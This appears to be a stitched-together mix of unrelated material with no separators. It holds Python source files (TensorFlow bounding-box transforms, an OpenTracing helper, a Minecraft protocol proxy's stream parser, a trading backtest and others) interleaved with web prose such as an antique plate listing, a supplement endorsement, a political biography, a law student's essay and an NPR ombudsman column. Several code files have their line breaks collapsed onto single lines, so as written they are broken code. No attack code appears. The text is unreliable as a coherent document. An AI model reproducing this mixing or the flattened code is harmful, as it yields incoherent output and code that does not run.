        targets_dx = (gt_boxes_urx - bboxes_urx) / (bboxes_width * variances[0])
        targets_dy = (gt_boxes_ury - bboxes_ury) / (bboxes_height * variances[0])

        targets_dw = tf.log(gt_boxes_width / bboxes_width) / variances[1]
        targets_dh = tf.log(gt_boxes_height / bboxes_height) / variances[1]

        targets = tf.concat(
            [targets_dx, targets_dy, targets_dw, targets_dh], axis=1)

        return targets


def decode(roi, deltas, variances=None):
    with tf.name_scope('BoundingBoxTransform/decode'):
        (roi_width, roi_height, roi_urx, roi_ury) = get_width_upright(roi)

        dx, dy, dw, dh = tf.split(deltas, 4, axis=1)

        if variances is None:
            variances = [1., 1.]

        pred_ur_x = dx * roi_width * variances[0] + roi_urx
        pred_ur_y = dy * roi_height * variances[0] + roi_ury
        pred_w = tf.exp(dw * variances[1]) * roi_width
        pred_h = tf.exp(dh * variances[1]) * roi_height

        bbox_x1 = pred_ur_x - 0.5 * pred_w
        bbox_y1 = pred_ur_y - 0.5 * pred_h

        # This -1. extra is different from reference implementation.
        bbox_x2 = pred_ur_x + 0.5 * pred_w - 1.
        bbox_y2 = pred_ur_y + 0.5 * pred_h - 1.

        bboxes = tf.concat(
            [bbox_x1, bbox_y1, bbox_x2, bbox_y2], axis=1)

        return bboxes


def clip_boxes(bboxes, imshape):
    """
    Clips bounding boxes to image boundaries based on image shape.

    Args:
        bboxes: Tensor with shape (num_bboxes, 4)
            where point order is x1, y1, x2, y2.
        imshape: Tensor with shape (2, )
            where the first value is height and the next is width.

    Returns:
        Tensor with same shape as bboxes but making sure that none
        of the bboxes are outside the image.
    """
    with tf.name_scope('BoundingBoxTransform/clip_bboxes'):
        bboxes = tf.cast(bboxes, dtype=tf.float32)
        imshape = tf.cast(imshape, dtype=tf.float32)

        x1, y1, x2, y2 = tf.split(bboxes, 4, axis=1)
        width = imshape[1]
        height = imshape[0]

        x1 = tf.maximum(tf.minimum(x1, width - 1.0), 0.0)
        x2 = tf.maximum(tf.minimum(x2, width - 1.0), 0.0)

        y1 = tf.maximum(tf.minimum(y1, height - 1.0), 0.0)
        y2 = tf.maximum(tf.minimum(y2, height - 1.0), 0.0)

        bboxes = tf.concat([x1, y1, x2, y2], axis=1)

        return bboxes


def change_order(bboxes):
    """Change bounding box encoding order.

    TensorFlow works with the (y_min, x_min, y_max, x_max) order while we
    work with the (x_min, y_min, x_max, y_max) one. While both encoding
    options have their advantages and disadvantages, we decided to use
    (x_min, y_min, x_max, y_max), forcing us to switch to TensorFlow's
    order every time we want to use a standard function that handles
    bounding boxes.

    Args:
        bboxes: A Tensor of shape (total_bboxes, 4)

    Returns:
        bboxes: A Tensor of shape (total_bboxes, 4) with the order swapped.
    """
    with tf.name_scope('BoundingBoxTransform/change_order'):
        first_min, second_min, first_max, second_max = tf.unstack(
            bboxes, axis=1
        )
        bboxes = tf.stack(
            [second_min, first_min, second_max, first_max], axis=1
        )
        return bboxes


if __name__ == '__main__':
    import numpy as np

    bboxes = tf.placeholder(tf.float32)
    bboxes_val = [[10, 10, 20, 22]]

    gt_boxes = tf.placeholder(tf.float32)
    gt_boxes_val = [[11, 13, 34, 31]]

    imshape = tf.placeholder(tf.int32)
    imshape_val = (100, 100)

    deltas = encode(bboxes, gt_boxes)
    decoded_bboxes = decode(bboxes, deltas)
    final_decoded_bboxes = clip_boxes(decoded_bboxes, imshape)

    with tf.Session() as sess:
        final_decoded_bboxes = sess.run(final_decoded_bboxes, feed_dict={
            bboxes: bboxes_val,
            gt_boxes: gt_boxes_val,
            imshape: imshape_val,
        })
        assert np.all(gt_boxes_val == final_decoded_bboxes)
Created in 1897, this antique Alfred Meakin dinner plate hails from Tunstall, England. Decorated in the Medway Blue pattern consisting of flowering tree branches, butterflies and a decorative inner band with geometric flowers, this is one of the prettiest antique dinner plates we have ever seen. Hard to find in single dish form, this beauty is a bit of a rarity, which makes it all the more treasured. Most Medway place settings are sold in whole or almost complete sets, so we are excited to offer this plate as a single item, whether it fills out your Medway collection or enhances your current mix and match china pieces. With over 120 years of age to it, it is fun to imagine all the dinner parties this one plate must have experienced. Dreamy and functional - that's the best kind of dinnerware in the land of the Vintage Kitchen! As for the pottery company, Alfred Meakin was in business from 1875-1976. After changing hands (and names!) several times throughout the 20th century, it finally came to rest with the Churchill Group in 1991. In gorgeous antique condition. Some very light utensil marks can be seen when held at an angle towards the light. There is a small, pencil-point-sized, very old chip near the rim of the plate (please see photos). Other than that, this plate is just lovely, especially considering it is over 120 years old. Measures 10 inches in diameter. Because this plate is so attractive in appearance, it would look lovely in a collection of mismatched blue and white china, or as an elegant wall hanging for a beach house or country cottage kitchen.
# Copyright (c) 2015 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

from __future__ import absolute_import

import opentracing


def start_child_span(operation_name, tracer=None, parent=None, tags=None):
    """
    Start a new span as a child of parent. If parent is None,
    start a new root span.

    :param operation_name: operation name
    :param tracer: Tracer or None (defaults to opentracing.tracer)
    :param parent: parent Span or None
    :param tags: optional tags
    :return: new span
    """
    tracer = tracer or opentracing.tracer
    return tracer.start_span(
        operation_name=operation_name,
        child_of=parent.context if parent else None,
        tags=tags
    )
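A minimal usage sketch (the operation names are hypothetical; only the opentracing package imported above is assumed, and its default tracer is a no-op, so this runs without a real tracing backend):

import opentracing

# Root span: no parent given, so start_child_span starts a new trace.
root = start_child_span('handle_request', tags={'component': 'demo'})

# Child span: linked to the root via child_of=root.context.
child = start_child_span('db_query', parent=root)

child.finish()
root.finish()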
Sally is a Level 3 qualified weight trainer, Personal Trainer and a runner. She has been weight training for a number of years and is now competing. Sally began to train at the age of 16 and, as soon as she began to see a difference in her physique, she was inspired to continue. Sally has suffered with 3 slipped discs in her spine but found that continuing to weight train really helped strengthen her muscles and reduce the pain. Sally was asked regularly by people in her gym if she competed in competitions but she never had; she only ever trained to keep fit. Now at the age of 43, she took part in her first competition at Miss Galaxy Universe 2012 and won the Fitness Model title. Sally uses a number of products in the LA Muscle range to help with her fitness career, including Diet Whey Protein (as her main source of protein), Six Pack Pill (to help keep her stomach in good shape and condition), Sculpt (to aid with her lean toned physique) and 311 BCAAs to ensure she has fully recovered from her tough training sessions.
# -*- coding: utf-8 -*-

# This source file is part of mc4p,
# the Minecraft Portable Protocol-Parsing Proxy.
#
# Copyright (C) 2011 Matthew J. McGill, Simon Marti

# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

import os.path, logging, logging.config


class PartialPacketException(Exception):
    """Thrown during parsing when a complete packet is not available."""
    pass


class Stream(object):
    """Represent a stream of bytes."""

    def __init__(self):
        """Initialize the stream."""
        self.buf = ""
        self.i = 0
        self.tot_bytes = 0
        self.wasted_bytes = 0

    def append(self, data):
        """Append a string to the stream."""
        self.buf += data

    def read(self, n):
        """Read n bytes, returned as a string."""
        if self.i + n > len(self.buf):
            self.wasted_bytes += self.i
            self.i = 0
            raise PartialPacketException()
        data = self.buf[self.i:self.i+n]
        self.i += n
        return data

    def reset(self):
        self.i = 0

    def packet_finished(self):
        """Mark the completion of a packet, and return its bytes as a string."""
        # Discard all data that was read for the previous packet,
        # and reset i.
        data = ""
        if self.i > 0:
            data = self.buf[:self.i]
            self.buf = self.buf[self.i:]
            self.tot_bytes += self.i
            self.i = 0
        return data

    def __len__(self):
        return len(self.buf) - self.i


def write_default_logging_file(lpath):
    """Write a default logging.conf."""
    contents = """
[loggers]
keys=root,mc4p,plugins,parsing

[handlers]
keys=consoleHdlr

[formatters]
keys=defaultFormatter

[logger_root]
level=WARN
handlers=consoleHdlr

[logger_mc4p]
handlers=
qualname=mc4p

[logger_plugins]
handlers=
qualname=plugins

[logger_parsing]
handlers=
qualname=parsing

[handler_consoleHdlr]
class=StreamHandler
formatter=defaultFormatter
args=(sys.stdout,)

[formatter_defaultFormatter]
format=%(levelname)s|%(asctime)s|%(name)s - %(message)s
datefmt=%H:%M:%S
"""
    f = None
    try:
        f = open(lpath, "w")
        f.write(contents)
    finally:
        if f:
            f.close()


logging_configured = False


def config_logging(logfile=None):
    """Configure logging. Can safely be called multiple times."""
    global logging_configured
    if not logging_configured:
        dir = os.path.dirname(os.path.abspath(__file__))
        if not logfile:
            logfile = os.path.join(dir, 'logging.conf')
        if not os.path.exists(logfile):
            write_default_logging_file(logfile)
        logging.config.fileConfig(logfile)
        logging_configured = True
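A short usage sketch of the Stream class (the byte values are made up; this is Python 2, like the module itself, and illustrates the partial-packet retry pattern the proxy relies on):

s = Stream()
s.append("\x00\x01")      # first half of a packet arrives
try:
    s.read(4)             # not enough data yet
except PartialPacketException:
    pass                  # read position was reset; wait for more bytes

s.append("\x02\x03")      # rest of the packet arrives
payload = s.read(4)       # now succeeds
packet_bytes = s.packet_finished()  # commit and retrieve the packet
assert packet_bytes == "\x00\x01\x02\x03"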
Acting Director of the Office of Personnel Management: Who Is Beth Cobert? Cobert is from Montclair, New Jersey, where her father, Maxwell, was a senior vice president of a fabric company and her mother, Shirley, was a freelance editor. Cobert graduated from Montclair High School in 1976. She stayed close to home in college, attending Princeton and earning a bachelor’s degree in economics in 1980. Cobert worked for a time at investment bankers Goldman Sachs in its corporate finance division, but left to earn her MBA at Stanford. She graduated from that school in 1984 and went to work for McKinsey & Co. consultants in New York. McKinsey is regarded by many in the business world as the most reputable, elite firm of its kind. The firm provides all kinds of advice to its corporate and public-sector clients, including how to approach downsizing. Cobert specialized in the financial services, telecommunications, and health-care industries. In 1994, she moved to McKinsey’s San Francisco office, where she remained for the rest of her tenure. She was a director and senior partner of the firm before she left in 2013 to join the federal government. Cobert was confirmed October 16, 2013, as OMB’s deputy director. While there, she urged changes in federal hiring practices, including considering the hiring of younger employees for shorter terms, putting hiring in the hands of the line departments instead of a human resources group, and instituting continuing training. Cobert married Adam Cioth, who at the time worked for Goldman Sachs, in 1987. Cioth went on to found a venture capital firm, Rolling Hills Capital. He’s now on the board of Students for Education Reform, an “astroturf” lobbying group (a “synthetic” grassroots movement) backing charter schools and taking power from teachers’ unions. They have a son and a daughter.
from typing import Tuple

import math

# max number of significant digits for a 64-bit float
_MAX_SIGNIFICANT_DIGITS_AFTER_DOT = 15
_MIN_EXP = -323
_MAX_EXP = 308


def sround(value: float, ndigits: int = 0, int_part=False) -> float:
    """
    Round *value* to significant number of digits *ndigits*.

    :param value: The value to round.
    :param ndigits: The number of digits after the first significant digit.
    :param int_part: If True, also allow rounding within the integer part,
        i.e. to the left of the decimal point; if False, values >= 1 keep
        their integer part intact.
    :return: the rounded value
    """
    ndigits_extra = _ndigits_extra(value, int_part=int_part)
    ndigits += ndigits_extra
    return round(value, ndigits=ndigits)


def sround_range(range_value: Tuple[float, float],
                 ndigits: int = 0,
                 int_part=False) -> Tuple[float, float]:
    value_1, value_2 = range_value
    ndigits_extra_1 = _ndigits_extra(value_1, int_part=int_part)
    ndigits_extra_2 = _ndigits_extra(value_2, int_part=int_part)
    ndigits += min(ndigits_extra_1, ndigits_extra_2)
    return round(value_1, ndigits=ndigits), round(value_2, ndigits=ndigits)


def _ndigits_extra(value: float, int_part: bool) -> int:
    ndigits = -int(math.floor(_limited_log10(value)))
    if ndigits < 0 and not int_part:
        return 0
    return ndigits


def _limited_log10(value: float) -> float:
    if value > 0.0:
        exp = math.log10(value)
    elif value < 0.0:
        exp = math.log10(-value)
    else:
        return _MIN_EXP
    if exp < _MIN_EXP:
        return _MIN_EXP
    if exp > _MAX_EXP:
        return _MAX_EXP
    return exp
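A brief usage sketch of the two public helpers (the values are chosen for illustration only):

# Leading zeros after the decimal point do not count as significant digits:
assert sround(0.00123456, ndigits=2) == 0.00123

# With int_part=True the rounding may reach into the integer part:
assert sround(1234.5, ndigits=0, int_part=True) == 1000.0

# sround_range applies the coarser of the two precisions to both ends:
assert sround_range((0.001234, 0.05678), ndigits=1) == (0.001, 0.057)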
I remember the first time that I walked the vaunted halls of HLS. After years of dedication, I felt blessed and privileged to be an incoming Harvard Law student. And yet, despite Dean Minow's reassurance that the admissions committee had not made a mistake, that in fact they had searched the world for us, I shared the nerves and insecurities of my peers. Worried about showing up late to my first class? Check. Worried about not getting my books on time? Check. Worried about embarrassing myself beyond repair during my first cold call? Double and triple check. Now two years older and still petrified of cold calls, I recognize that underlying my concerns was the fear of not fitting in. I struggled to internalize my accomplishments and carried a persistent fear of being exposed as a fraud. It took me a few weeks into my first semester to realize I was not alone in dealing with what is commonly known as impostor syndrome. My fear of not fitting in grew exponentially when I began applying for professional positions. I was raised by two tremendously hardworking parents. My dad worked in construction and my mom, all 4′ 11″ of her, hung off the edge of Los Angeles skyscrapers, cleaning their windows. My parents are my role models, and seeing them get ready for work every morning in a translucent vest, hardhat and steel-toed boots shaped my notion of a work uniform. I saw their uniforms as empowering symbols of hard work and perseverance. However, the idea of having a suit as my work uniform made me uneasy. As a first generation law student, I had never owned a suit and didn't know the first thing about tying a Full Windsor knot or differentiating between wingtips and cap toes. With EIP and OPIA interviews approaching, I grew anxious. Thankfully, I did not need to take this next step alone. We have all gotten to this point because we've overcome substantial trials and tribulations. I was hesitant to share my distress because I knew how trivial it could seem. Still, I eventually opened up to a friend. The next day we jumped on the Red Line, made our way to downtown Boston and together we picked out my first suit. I know we've all heard it by now but it warrants repeating — the people at HLS are what make it a world-class institution. Last year, HLS held its Third Celebration of Latino Alumni. During the festivities, I grew close to one alumna in particular as we bonded over our Los Angeles roots. She asked if I had suits for my summer internship. I told her that I had my first suit but would welcome help selecting my second. Before I knew it, she put me in contact with her husband and that spring break I received an early Christmas present when he took me shopping to fill out my summer wardrobe. I was blown away by their generosity and eagerness to help. They only asked for one thing in return: that I pay it forward. I used to shudder at the idea of networking, the thought of having to force a connection with a stranger. However, my experience these past two years has taught me that networking can take a whole different meaning when you stop thinking about it as seeking professional connections and allow yourself to simply make human connections. You were chosen as much for your impressive abilities as a student as for your remarkable traits as human beings. As you enter HLS, you might feel your insecurities and innermost fears will alienate you from your peers. From first-hand experience, I know you'd be badly mistaken.
Confronting them and overcoming them alongside your classmates is what will bring you all together. Remain open to the amazing collection of individuals you will meet in your time at HLS because, with over 1,500 classmates, you WILL meet amazing individuals. You will undoubtedly have your share of fears — we all did and do — but don’t allow the fear of letting people in be one of them. Let people in and they just might surprise you. Hector Grajeda is a 3L. He is the vice president of communications of La Alianza.
#!/usr/bin/python import re,sys, getopt ##################################### # last update 03/31/2013 by J. Mass # # version = '0.1' # ##################################### def usage(): print (""" ############################## # Scythe_gff2loc.py v0.1 # ############################## -f, --file=gff3_FILE (tested w/ _gene.gff3 from phytozome) -o, --output=FILE output file [default: gff3_FILE.loc] -h, --help prints this """) sys.exit(2) def read_gff2loc(infile, outfile): infile = open(infile, 'r') outfile = open(outfile, 'w') loci = {} longest = {} rawstr = r"""(Name=)(.*);pacid.*(longest=)(.*);(Parent=)(.*)""" cnt = 0 for ln in infile: s =ln m = re.findall(rawstr, s) if len(m) >0: name = m[0][1] isLongest = m[0][3] parent = m[0][5] if isLongest == str(1): if parent in longest: print("#Warning "+parent+" has more than one default model\nCheck your gff -> ", longest[parent], name) longest[parent]=name #longest will be printed to 2nd col elif isLongest == str(0): if parent in loci: loci[parent].append(name) else: loci[parent]=[name] s_def = sorted(longest.keys()) for k_def in s_def: try: outfile.write(k_def+"\t"+longest[k_def]+"\t"+"\t".join(loci[k_def])+"\n") except KeyError as ke: outfile.write(k_def+"\t"+longest[k_def]+"\n") if k_def in loci: del loci[k_def] s = sorted(loci.keys()) for k in s: try: outfile.write(k+"\t"+longest[k]+"\t"+"\t".join(loci[k])+"\n") except KeyError as ke: print("#Warning "+k+" has no default model\n") outfile.write(k+"\t"+"\t".join(loci[k])+"\n") return loci ################################### outfile = None infile = None ################################### try: opts, args = getopt.gnu_getopt(sys.argv[1:], "f:ho:", ["file=","help", "output="]) except getopt.GetoptError as err: print (str(err)) usage() for o, a in opts: if o in ("-f", "--file"): infile=a elif o in ("-h", "--help"): usage() elif o in ("-o", "--output"): outfile = a else: assert False, "unhandled option" ######################################## if infile is None: usage() if outfile is None: outfile = infile+".loc" ######################################## read_gff2loc(infile, outfile)
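To illustrate what the regular expression in read_gff2loc captures, here is a small sketch; the attribute string below is a made-up example in the phytozome _gene.gff3 style, not taken from a real file:

import re

rawstr = r"""(Name=)(.*);pacid.*(longest=)(.*);(Parent=)(.*)"""
line = "Name=AT1G01010.1;pacid=19655142;longest=1;Parent=AT1G01010"
m = re.findall(rawstr, line)
# m[0] groups: ('Name=', 'AT1G01010.1', 'longest=', '1', 'Parent=', 'AT1G01010')
name, is_longest, parent = m[0][1], m[0][3], m[0][5]
print(name, is_longest, parent)  # AT1G01010.1 1 AT1G01010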
The Johnson High School Atom Smashers replaced their orange and blue school colors with pink Wednesday in support of Breast Cancer Awareness Month. Participants from the campus and community paid $10 each to walk a trail around the campus. Prizes were awarded to groups that walked the most laps. Student groups also collected donations and sold breast cancer ribbon pins. About $250 was raised, and all proceeds will benefit the American Cancer Society and the Georgia Cancer Society. This is the second year Johnson High has hosted the "Making Strides to Smash Cancer" walk. Senior Amanda Amyx said she participates because the cause is important to her. "My grandmother had breast cancer, and she was finally cured last week - 100 percent cancer-free," she said. "I do this so people know how important it is to have exams and to be aware of what is happening with their health." During the month of October, public service organizations, professional medical associations and government agencies across the country host activities to increase awareness about breast cancer and raise funds for prevention and research. "It is important for everyone to support this initiative because many of us have been affected by cancer in some way. It may have been a personal experience or through the experience of a loved one," said Johnson High teacher Bettina Tate.
""" Testing utilities backported from recent Django versions, for testing with older Django versions. """ from __future__ import with_statement from django.conf import settings, UserSettingsHolder from django.utils.functional import wraps class override_settings(object): """ Acts as either a decorator, or a context manager. If it's a decorator it takes a function and returns a wrapped function. If it's a contextmanager it's used with the ``with`` statement. In either event entering/exiting are called before and after, respectively, the function/block is executed. """ def __init__(self, **kwargs): self.options = kwargs self.wrapped = settings._wrapped def __enter__(self): self.enable() def __exit__(self, exc_type, exc_value, traceback): self.disable() def __call__(self, func): @wraps(func) def inner(*args, **kwargs): with self: return func(*args, **kwargs) return inner def enable(self): override = UserSettingsHolder(settings._wrapped) for key, new_value in self.options.items(): setattr(override, key, new_value) settings._wrapped = override def disable(self): settings._wrapped = self.wrapped
This beautifully appointed home with four bedrooms (plus an additional bonus room), two full bathrooms, nearly 3000 SQ FT, a two car garage (with electric vehicle charging station and OVERSIZED H2O heater), a sparkling swimming pool, a ginormous gourmet kitchen complete with island/great room/dining combo for family togetherness, and a fantastic floor plan can be yours if you act fast!!! The owners have installed many high end fixtures throughout that make this home just shine with pride of ownership. They have recently installed wood look porcelain throughout that looks amazing and is easy to keep clean. Some of the other features include an R/V gate, newly installed turf, an inspected & fully fenced pool, a security screen door on the front of the home, an oversized hot water heater, energy efficient sunscreens, a HUGE master, etc!
import os from zipfile import ZipFile from itertools import izip_longest from django.conf import settings from utils import save_to_file, save_to_zip, set_header, get_diff from apps.weapon.models import Weapon, ECM, Sensor, Repair, Construction, Brain, WeaponSound from apps.structure.models import Structure, StructureDefence, StructureWeapon, BodyDefence, Feature from apps.function.models import StructureFunction, Function from apps.body.models import Body, Propulsion, PropulsionSound, PropulsionType, BodyPropulsion from apps.templates.models import Template, TemplateWeapon from apps.research.models import (Research_Cam1, ResearchFunctions_Cam1, ResearchPreRequisites_Cam1, ResultStructure_Cam1, ResearchStructure_Cam1, ResultComponent_Cam1, ResearchObsoleteComponent_Cam1, ResearchObsoletStructure_Cam1, Research_Cam2, ResearchFunctions_Cam2, ResearchPreRequisites_Cam2, ResultStructure_Cam2, ResearchStructure_Cam2, ResultComponent_Cam2, ResearchObsoleteComponent_Cam2, ResearchObsoletStructure_Cam2,Research_Cam3, ResearchFunctions_Cam3, ResearchPreRequisites_Cam3, ResultStructure_Cam3, ResearchStructure_Cam3, ResultComponent_Cam3, ResearchObsoleteComponent_Cam3, ResearchObsoletStructure_Cam3,Research_Multiplayer, ResearchFunctions_Multiplayer, ResearchPreRequisites_Multiplayer, ResultStructure_Multiplayer, ResearchStructure_Multiplayer, ResultComponent_Multiplayer, ResearchObsoleteComponent_Multiplayer, ResearchObsoletStructure_Multiplayer) classes = [ Weapon, Feature, Construction, Structure, StructureFunction, Body, Propulsion, PropulsionSound, PropulsionType, StructureDefence, StructureWeapon, Function, BodyDefence, ECM, Sensor, Repair, BodyPropulsion, Brain, WeaponSound, Template, TemplateWeapon, Research_Cam1, ResearchFunctions_Cam1, ResearchPreRequisites_Cam1, ResultStructure_Cam1, ResearchStructure_Cam1, ResultComponent_Cam1, ResearchObsoleteComponent_Cam1, ResearchObsoletStructure_Cam1, Research_Cam2, ResearchFunctions_Cam2, ResearchPreRequisites_Cam2, ResultStructure_Cam2, ResearchStructure_Cam2, ResultComponent_Cam2, ResearchObsoleteComponent_Cam2, ResearchObsoletStructure_Cam2,Research_Cam3, ResearchFunctions_Cam3, ResearchPreRequisites_Cam3, ResultStructure_Cam3, ResearchStructure_Cam3, ResultComponent_Cam3, ResearchObsoleteComponent_Cam3, ResearchObsoletStructure_Cam3,Research_Multiplayer, ResearchFunctions_Multiplayer, ResearchPreRequisites_Multiplayer, ResultStructure_Multiplayer, ResearchStructure_Multiplayer, ResultComponent_Multiplayer, ResearchObsoleteComponent_Multiplayer, ResearchObsoletStructure_Multiplayer ] classes = [x for x in classes if x.objects.count()] def save_all(): [set_header(x) for x in classes if not x.load_from_first] texts = [cls.get_data() for cls in classes] diffs = [get_diff(cls, text) for cls, text in zip(classes, texts)] if settings.MOD_SOURCE: [save_to_file(cls, text) for cls, text in zip(classes, texts)] else: zf = ZipFile(settings.PATH_TO_MOD) names = set(zf.namelist()) - set([x.FILE_PATH for x in classes]) data = [(path, zf.read(path)) for path in names] zf.close() zf = ZipFile(settings.PATH_TO_MOD, 'w') [save_to_zip(cls, zf, text) for cls, text in zip(classes, texts)] [zf.writestr(file, text) for file, text in data] zf.close() return diffs def save_xml(): 'does not work with archive' texts = [cls.get_xml() for cls in classes] [save_to_file(cls, text, format='xml') for cls, text in zip(classes, texts)] return [['Saved to XML', [('green', 'ok')]]]
First product is under development! Shewstone Publishing's first product will be an original pen-and-paper roleplaying game of historical fantasy, set in Renaissance Europe. We're in the very early stages. It is too early to say when this product will be ready, other than it will be in 2017 at the earliest. We'll announce further details when we can. At this time, we are concentrating on writing and producing this game, and are not planning to start any additional projects until this one is finished.
from __future__ import absolute_import, division, print_function, unicode_literals
import pandas as pd
import numpy as np
from pythonToolbox.toolbox import backtest


def settings():
    exchange = "stocks"        # Exchange to download data for (nyse or nasdaq)
    markets = ['A', 'AAPL', 'IBM', 'GOOG', 'C']  # Stocks to download data for.
    # Leave blank to download all stocks for the exchange (~900 stocks)
    date_start = '2015-01-03'  # Date to start the backtest
    date_end = '2016-11-06'    # Date to end the backtest
    lookback = 120             # Number of days you want historical data for

    """ To make a decision for day t, your algorithm will have historical data
    from t-lookback to t-1 days """
    return [exchange, markets, date_start, date_end, lookback]


def trading_strategy(lookback_data):
    """
    :param lookback_data: Historical Data for the past "lookback" number of
    days as set in the main settings. It is a dictionary of features such as
    'OPEN', 'CLOSE', 'HIGH', 'LOW', 'VOLUME', 'SLIPPAGE', 'POSITION', 'ORDER',
    'FILLED_ORDER', 'DAILY_PNL', 'TOTAL_PNL', 'FUNDS', 'VALUE'.
    Any feature data can be accessed as: lookback_data['OPEN']
    Each feature is a pandas dataframe with dates as the index (rows)
    and markets as columns.
    To see a complete list of features, uncomment the line below:
    # print(lookback_data.keys())

    :return: A pandas dataframe with the markets you are trading as index
    (rows) and signal, price and quantity as columns.
    order['SIGNAL']: buy (+1), hold (0) or sell (-1) trading signals for all
    securities in markets[]
    order['PRICE']: The price where you want to trade each security. Buy
    orders are executed at or below the price and sell orders are executed
    at or above the price.
    order['QUANTITY']: The quantity of each stock you want to trade.
    The system will buy the specified quantity of a stock if its
    price <= the price specified here, and sell the specified quantity
    of a stock if its price >= the price specified here.

    IMPORTANT: Please make sure you have enough funds to buy or sell.
    The order is cancelled if order_value > available funds (both buy
    and short sell).
    """
    order = pd.DataFrame(0, index=lookback_data['POSITION'].columns,
                         columns=['SIGNAL', 'WEIGHTS', 'PRICE'])

    ## YOUR CODE HERE
    period1 = 120
    period2 = 30

    markets_close = lookback_data['CLOSE']
    market_open = lookback_data['OPEN']

    avg_p1 = markets_close[-period1:].sum() / period1
    avg_p2 = markets_close[-period2:].sum() / period2
    sdev_p1 = np.std(markets_close[-period1:], axis=0)

    difference = avg_p1 - avg_p2
    deviation = pd.Series(0, index=lookback_data['POSITION'].columns)

    criteria_1 = np.abs(difference) > sdev_p1
    criteria_2 = np.sign(difference) == np.sign(lookback_data['POSITION'])
    deviation[criteria_1] = difference
    deviation[criteria_2] = difference

    total_deviation = np.absolute(deviation).sum()
    if total_deviation == 0:
        return order
    else:
        order['WEIGHTS'] = np.absolute(deviation / total_deviation)
        order['SIGNAL'] = np.sign(deviation)
        # order['PRICE'][order['SIGNAL']>0] = (avg_p1-sdev_p1)[order['SIGNAL']>0]
        # order['PRICE'][order['SIGNAL']<0] = (avg_p1+sdev_p1)[order['SIGNAL']<0]
        return order


if __name__ == '__main__':
    [exchange, markets, date_start, date_end, lookback] = settings()
    backtest(exchange, markets, trading_strategy, date_start, date_end,
             lookback)  # ,verbose=True
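The core of the strategy is a long/short moving-average comparison gated by volatility. A standalone sketch of that computation for one market, using synthetic prices and independent of the backtester (the thresholding mirrors criteria_1 above):

import numpy as np

close = 100 + np.cumsum(np.random.randn(200))  # synthetic close prices
avg_long = close[-120:].mean()   # 120-day average
avg_short = close[-30:].mean()   # 30-day average
sdev = close[-120:].std()

difference = avg_long - avg_short
# Trade only when the gap between the averages exceeds one standard deviation.
if abs(difference) > sdev:
    signal = np.sign(difference)  # +1 buy, -1 sell
else:
    signal = 0
print(signal)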
The Patriotism Of NPR And Its Sponsor Al Jazeera America : NPR Public Editor Images on Al Jazeera of brutalized Americans in Iraq understandably still trouble some listeners, but NPR's acceptance of sponsorship support from the new Al Jazeera America fall well within free speech and ethical standards. Al Jazeera itself brings a valuable international voice into our living rooms. Joie Chen, host of the new Al Jazeera America nightly news program America Tonight, sits at the anchor desk in the network's studio space at the Newseum in Washington, D.C. "I respect the right of the Muslim world to have more of a voice and presence in the world and the United States," Becky Miller of Charleston, S.C., wrote. "Heavens knows, they need better press than what their extremists have offered in the last decade. But the images of the beheadings and the swinging charred bodies of Americans still haunt me." The only aired beheading turned out to be a hoax according to an overview of Al Jazeera's coverage by Pew Research Center's Project for Excellence in Journalism. But the network did air other graphic images as well as statements by Osama bin Laden. You would not accept money/ads from other organizations that have hurt Americans in the past (KKK, white supremacists, or other hate organizations), regardless of claims that they are just news reporters. Al Jazeera forfeited the right to be treated as just a newspaper [sic] when it acted as a mouthpiece for enemies, published their propaganda, and displayed news and video proudly displaying American deaths. I found it too hard to listen to NPR this morning after you played the Al Jazerra ad. It was easier to drive in silence. Last week I heard an interview between an NPR reporter and people representing Al-Jazeera, as well as some media critics. Do you folks really believe that news network is going to give free reign to American journalists and writers? If you believe that then I have some beach property in Tulsa that should interest you. I hope I am wrong. I mean that. Perhaps the proof is about to be found in the pudding. If the US strikes Syria, then let's see how Al-Jazeera covers that in the U.S. As a veteran, I am sensitive to images of killed soldiers, but we must protect the free speech we fight for in the first place. I sympathize with the sentiments behind these criticisms, but upon mulling over the stories and the ads, I am afraid that I cannot agree. The ethical issue over NPR's stories comes down to trust. The patriotism concern comes down to free speech. The question of naïveté comes down to changing bias standards and a look at Al Jazeera America itself. I have dealt at length in earlier posts with the ethics surrounding stories and sponsors. NPR stories that deal in some way with a sponsor generally need not mention the relationship any more than stories in the commercial news media are not expected to mention an advertiser. Advertising and sponsorship are effectively the same, transparently heard on-air or seen online. There is no secret that needs to be divulged. To be eligible as a tax write-off, public media sponsorships must follow certain rules, such as length and call to action, but this has nothing to do with a need for transparency. NPR's large number of such sponsors, meanwhile, further guarantees that no single one has influence, if ever one tried to exert it, which in real life almost all know not to do. 
